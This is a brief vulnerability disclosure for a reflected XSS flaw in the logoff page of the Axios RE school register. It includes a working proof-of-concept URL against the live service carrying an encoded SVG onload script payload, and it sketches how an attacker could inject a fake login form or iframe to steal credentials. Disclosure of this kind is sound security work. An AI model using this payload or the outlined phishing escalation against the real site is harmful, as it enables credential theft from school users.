XSS vulnerability in Axios RE - School register When an error occurs or when the user wants to logout, the RE-Logoff page is called. The page requires two parameters: Error_Desc describes shortly what happened, Error_parameters gives extra info about the error, like an error code. Both URI parameters are embedded directly in the HTML code during the request, making the page vulnerable to xss attacks. An attacker could embed in the url a form directed to an external or an iframe crafting a malicious login page to steal credentials. POC: https://family.axioscloud.it/Secret/RELogOff.aspx?Error_Desc=[9999]%20Autorizzazione%20Negata%20all%27uso%20della%20Procedura&Error_Parameters=Non%20%C3%A8%20consentito%20l%27accesso%20simultaneo%20da%20%3Csvg/style=%27display:none%27onload=alert(%27xss%27)%3E%3C/svg%3E%20pi%C3%B9%20schede%20del%20browser.%20Si%20prega%20di%20controllare%20se%20esistono%20altre%20finestre%20del%20browser%20aperte%20e%20chiuderle%20prima%20di%20tentare%20di%20accedere%20al%20sistema.